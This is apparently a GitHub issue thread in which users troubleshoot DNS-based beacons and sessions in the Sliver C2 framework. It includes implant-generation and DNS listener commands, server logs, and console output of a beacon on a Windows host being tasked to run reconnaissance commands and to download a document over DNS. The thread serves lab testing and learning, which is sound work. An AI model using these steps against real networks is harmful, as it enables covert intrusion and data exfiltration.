Unable to establish C2 Session DNS implant or having stability issues with the C2 Beacon DNS implant

[MelCrypto]

Hello,

Thanks for any help, after a lot of time spent, I am sure the issue is a damn dot or comma at the wrong place or missing that I just cant see since anymore since I have been at this for hours

Long story short, my SLIVER client / server setup works fine with ALL C2 except DNS

So far I have :

I have setup Kali Linux & Ubuntu 22.04 (to validate if the issue was Kali related) I have deployed both Linux instances on AWS & on a home VMware server I have deployed a BIND9 Ubuntu server to log DNS queries sent by the clients I have performed packet captures on both ends I have created two different DNS zones (one in GoDaddy, one in NameCheap) to validate if there was anything special done by the DNS provider

====================================================================================== From the client the DNS response is : No Such name A baakbejmk4e8.blah.com

From the Kali/Sliver Server side sliver.log file I get : [36mINFO[0m[2022-09-14T21:40:41Z] [sliver/server/c2/dns.go:362] 'baakbew2q088.c2.blah.com.' is subdomain of '.' [33mWARN[0m[2022-09-14T21:40:41Z] [sliver/server/c2/dns.go:390] [dns] session not found for id 0 (0) [36mINFO[0m[2022-09-14T21:40:43Z] [sliver/server/c2/dns.go:362] 'baakbew2q088.c2.blah.com.' is subdomain of '.' [33mWARN[0m[2022-09-14T21:40:43Z] [sliver/server/c2/dns.go:390] [dns] session not found for id 0 (0) [36mINFO[0m[2022-09-14T21:40:44Z] [sliver/server/c2/dns.go:362] 'baakbew2q088.c2.blah.com.' is subdomain of '.' [33mWARN[0m[2022-09-14T21:40:44Z] [sliver/server/c2/dns.go:390] [dns] session not found for id 0 (0)

2.2.2.2 = Kali Linux SLIVER Server 1.1.1.1 = AWS DNS Server relaying the DNS Queries from the C2 DNS Client on the Internet

---

07:57:33.402255 IP 103.62.51.24.31008 > 2.2.2.2.53: 37361% [1au] A? baakbew2q088.c2.blah.com. (66) 07:57:33.402668 IP 2.2.2.2.53 > 103.62.51.24.31008: 37361 NXDomain*- 0/0/0 (55) 07:57:34.438323 IP 1.1.1.1.65385 > 2.2.2.2.53: 27502% [1au] A? baakbew2q088.c2.blah.com. (66) 07:57:34.438700 IP 2.2.2.2.53 > 1.1.1.1.65385: 27502 NXDomain*- 0/0/0 (55) 07:57:35.561961 IP 103.62.51.20.44219 > 2.2.2.2.53: 43629 [1au] A? baakbew2q088.c2.blah.com. (66) 07:57:35.562310 IP 2.2.2.2.53 > 103.62.51.20.44219: 43629 NXDomain*- 0/0/0 (55) 07:57:38.026881 IP 103.62.51.24.63425 > 2.2.2.2.53: 8345% [1au] A? baakbew2q088.c2.blah.com. (66) 07:57:38.027254 IP 2.2.2.2.53 > 103.62.51.24.63425: 8345 NXDomain*- 0/0/0 (55) 07:57:38.966361 IP 103.62.51.24.14478 > 2.2.2.2.53: 19276 [1au] A? baakbew2q088.c2.blah.com. (66) 07:57:38.966720 IP 2.2.2.2.53 > 103.62.51.24.14478: 19276 NXDomain*- 0/0/0 (55) 07:57:42.271472 IP 103.62.51.20.54662 > 2.2.2.2.53: 30161% [1au] A? baakbew2q088.c2.blah.com. (66) 07:57:42.271853 IP 2.2.2.2.53 > 103.62.51.20.54662: 30161 NXDomain*- 0/0/0 (55) 07:57:43.306301 IP 1.1.1.1.51511 > 2.2.2.2.53: 54663% [1au] A? baakbew2q088.c2.blah.com. (66) 07:57:43.306702 IP 2.2.2.2.53 > 1.1.1.1.51511: 54663 NXDomain*- 0/0/0 (55)

======================================================================================

Lab Install / Steps :

1. Installed Kali Linux vanilla with net-tools & latest version of SLIVER
2. Generated C2 Beacon using the following CMD generate --dns c2.blah.com. beacon -N AWS-V1-Blah-DNS-C2-Beacon --save /home/kali/implants-v1/AWS-V1-DNS-Blah-C2-Beacon.exe
3. Ran the implant on a Windows 10 vanilla laptop
4. Confirmed that DNS queries are seen on both end

I am fairly certain that the issue is with the DNS zone now but for the life of me, I cannot figure out where is the missing or extra DOT somewhere

Followed the procedure for C2 DNS at this URL : https://github.com/BishopFox/sliver/wiki/DNS-C2

Before I bang my head against the wall, can someone tell me what I have done wrong ?

Thanks for the help

[moloch--]

Try generating an implant with the --debug flag and see if it shows any errors, you may also want to increase the verbosity of the server-side logs in the server config file. From a glance it looks right, but we may be missing something simple that the logs will reveal.

[moloch--]

Oh, make sure to specify the full domain when you start the dns listener, e.g.

dns --domains c2.blah.com.

[MelCrypto]

Hey moloch, thanks for the quick reply,

Was able to generate WAY more debug information this time around, thanks for the tip of the --domain flag

Cant seem to find what level of log verbosity you wish, it is set at 4 currently, let me know what you need it at and I will go through the testing sequence

If you can reply back with any request within the next 8 hrs I can provide more debug, after that, I will be offsite for 7 days and will be able to provide you anything you need in 8 days from now

---

Starting the DNS listener with the --domains flag has produced some very different and interesting results and outputs, please find below a few observations

1- Main difference is that with this additional flag, the C2 Sever now responds to DNS queries received from the remote implant

2- Not only does the C2 server respond, but I am now able to see SESSION advertisements on the console, however, they do not last more than a second or so but that has not happened before.

3- When I start the listener with the --domains flag using a C2 debug beacon implant, I see the beacon register with the console but when I want to view the active sessions it is never shown as an "ALIVE" sessions or shown at all for that matter

4- When I start the listener with the --domains flag using a C2 debug session implant, I see the session register super quick but it goes from "ALIVE" to "DEAD" within seconds

Attaching redacted debug files from both BEACON and SESSION testing done just now

DEBUG Files from the Sessions testing Debug-Sliver-Session-Client-Blah-001.txt What was seen on the Sliver-Server Console Debug-Sliver-Session-Server-Blah-001.txt Output from tail -f .sliver/logs/sliver.log Debug-Sliver-Session-Client-Blah-001.txt Output from the Windows Command Prompt box seen

DEBUG Files from the Beacons testing Debug-Sliver-Beacon-Client-Blah-001.txt What was seen on the Sliver-Server Console Debug-Sliver-Beacon-Server-Blah-001.txt Output from tail -f .sliver/logs/sliver.log Debug-Sliver-Beacon-Server-Console-Blah-001.txt Output from the Windows Command Prompt box seen

Debug-Sliver-Beacon-Server-Blah-001.txt Debug-Sliver-Beacon-Server-Console-Blah-001.txt Debug-Sliver-Beacon-Client-Blah-001.txt

Debug-Sliver-Session-Server-Console-Blah-001.txt Debug-Sliver-Session-Client-Blah-001.txt Debug-Sliver-Session-Server-Blah-001.txt

[MelCrypto]

Hey Moloch, Additional observations

SESSION 1- non-debug session implant connects to the C2 server and registers to the console 2- Goes from ALIVE to DEAD within 2-5 seconds

BEACON 1- non-debug beacon implant connects to the C2 server and seems to remains connected

2- Sent a few tasks (whoami, ifconfig) and they get registered

3- But the tasks dont seem to be sent even after a few checkins

2a6f562b aws-v1-blah-dns-c2-beacon 0/3 dns n/a DESKTOP-XXXXX User windows/amd64 Fri Sep 16 08:44:55 AEST 2022 (9s ago) Fri Sep 16 08:46:01 AEST 2022 (in 57s)

[DominicBreuker]

Did some DNS experiments in a lab and also had some problems, but not nearly as severe as yours. Beacons worked perfectly. Sessions came in but died within seconds or minutes. However, they were usable, did some ls and whoami and got results.

Mind if you send me your exact Sliver version (mine was v1.5.16 - 140c47e163541340295d3f2b530fe800eccf7156). I could try with yours and see if I get errors similar to those you describe above. If not, the problem must be the environment (mine is pure lab env, only VMs, probably not too much packet loss, see here for details)

[MelCrypto]

Hello Moloch ,

I am now back onsite and have re-imaged both AWS and VMware labs running all of the latest Kali & Sliver and Linux packages and I am happy to report that I am now running a very stable C2 DNS beacon infra where all things work very, I was able to send out all types of commands, deploy armory payload, in general the C2 DNS beacon is very stable and effective, need to point out that in DEBUG mode, the C2 beacon missed a few tasks, which I thought was related to my initial problem but once I removed the DEBUG flag, the C2 DNS beacon didn't miss a beat and purred like a kitten. C2 DNS sessions are still an issue and consistently die after a few seconds of establishing with the SLIVER server, happy to provide debugs of anything you need to have this looked at and get this addressed.

This environment will be up and running for some time, so happy to provide any debug information or run any kind of test you need. I will be testing out the Linux and MAC implants in the coming days / weeks, so shout out if you need / want anything to help get this AMAZING C2 framework even better.

Wanted to share some thanks to @DominicBreuker for the well documented web site related to Sliver, it helped me fine tune a bit some parts of my infrastructure, so kudos to you, will be going through the armory in great detail in the coming days / weeks, so happy to share some findings with you if you are interested. You should find a way to get your site better indexed with Search engines, when I looked for help, I never saw it in my search results.

All in all, wanted to say that SLIVER is just AMAZING and for now free, so, it is a great opportunity to learn about C2 and ways to use, detect, prevent, isolate C2 tech in general.

Cheers @moloch-- , keep up the good work and let me know if you need anything ?

[MelCrypto]

Hello Moloch,

Lab environment is still very stable across the Internet with minimal security controls at each end,

We have moved the DNS beacons inside a more restrictive environment and the beacon remains [ALIVE] for days, we were able to issue a few basic commands (whoami, ifconfig, pwd) in the first 24hrs, but since then, any commands sent to the beacon are registered as SENT / COMPLETED but the C2 DNS beacon never provide any output or payload from or to the secure environment. (multiple reboot of the client were done and different HASH of the binary were executed).

We cannot find any traces of security controls block related to this C2 in any of the security systems observed in the secure environment while the beacon remains [ALIVE]

Let me know what debug information you need to help out with this ?

sliver > beacons

ID Name Transport Username Operating System Last Check-In Next Check-In ========== ============================== =========== ================= ================== =============== =============== 387b48c7 prod-aws-Blah-dns-c2-beacon dns SECURE\User windows/amd64 58s ago 31s

sliver > use

? Select a session or beacon: BEACON 387b48c7 prod-aws-Blah-dns-c2-beacon n/a HOST SECURE\User windows/amd64 [*] Active beacon prod-aws-Blah-dns-c2-beacon (387b48c7-3f40-4987-96ef-68125f5fffbf)

sliver (prod-aws-Blah-dns-c2-beacon) > upload /home/kali/non-ORG-Word.docx

[*] Tasked beacon prod-aws-Blah-dns-c2-beacon (fbd505f7)

sliver (prod-aws-Blah-dns-c2-beacon) > tasks

ID State Message Type Created Sent Completed ========== ========= ============== ================================ ====== =========== fbd505f7 pending Upload Wed, 05 Oct 2022 10:18:13 AEDT

sliver (prod-aws-Blah-dns-c2-beacon) > download ORG-Word.docx

[*] Tasked beacon prod-aws-Blah-dns-c2-beacon (c536ce4f)

sliver (prod-aws-Blah-dns-c2-beacon) > tasks

ID State Message Type Created Sent Completed ========== ======= ============== ================================ ================================ =========== c536ce4f sent Download Wed, 05 Oct 2022 10:18:32 AEDT Wed, 05 Oct 2022 10:19:25 AEDT
fbd505f7 sent Upload Wed, 05 Oct 2022 10:18:13 AEDT Wed, 05 Oct 2022 10:18:17 AEDT

sliver (prod-aws-Blah-dns-c2-beacon) > pwd

[*] Tasked beacon prod-aws-Blah-dns-c2-beacon (39c5f173)

sliver (prod-aws-Blah-dns-c2-beacon) > tasks

ID State Message Type Created Sent Completed ========== ========= ============== ================================ ================================ =========== 39c5f173 pending Pwd Wed, 05 Oct 2022 10:21:30 AEDT
c536ce4f sent Download Wed, 05 Oct 2022 10:18:32 AEDT Wed, 05 Oct 2022 10:19:25 AEDT
fbd505f7 sent Upload Wed, 05 Oct 2022 10:18:13 AEDT Wed, 05 Oct 2022 10:18:17 AEDT

sliver (prod-aws-Blah-dns-c2-beacon) > tasks

ID State Message Type Created Sent Completed ========== ======= ============== ================================ ================================ =========== 39c5f173 sent Pwd Wed, 05 Oct 2022 10:21:30 AEDT Wed, 05 Oct 2022 10:21:52 AEDT
c536ce4f sent Download Wed, 05 Oct 2022 10:18:32 AEDT Wed, 05 Oct 2022 10:19:25 AEDT
fbd505f7 sent Upload Wed, 05 Oct 2022 10:18:13 AEDT Wed, 05 Oct 2022 10:18:17 AEDT

sliver (prod-aws-Blah-dns-c2-beacon) > beacons

ID Name Transport Username Operating System Last Check-In Next Check-In ========== ============================== =========== ================= ================== =============== =============== 387b48c7 prod-aws-Blah-dns-c2-beacon dns SECURE\User windows/amd64 45s ago 30s

sliver (prod-aws-Blah-dns-c2-beacon) >

[p3tr0v]

Hi @MelCrypto and @DominicBreuker I'm trying to reproduce DNS tunneling in my lab, but whenever I execute the implant in Windows target I dont see any answer from my Sliver, there is no communication established! I created my DNS FQDN in Dynu and opened a question here #975 Seems both of you have more experience with Sliver DNS, could you help me? Do I have to change some configuration in my Linux? Change some BIND configuration?

[parzel]

I was facing the same issues as people in this issue that my beacon died after only a few seconds or one or two commands. The recommendation in #718 to force a resolv.conf completely fixed all timeout issues for me. Hope it helps someone else.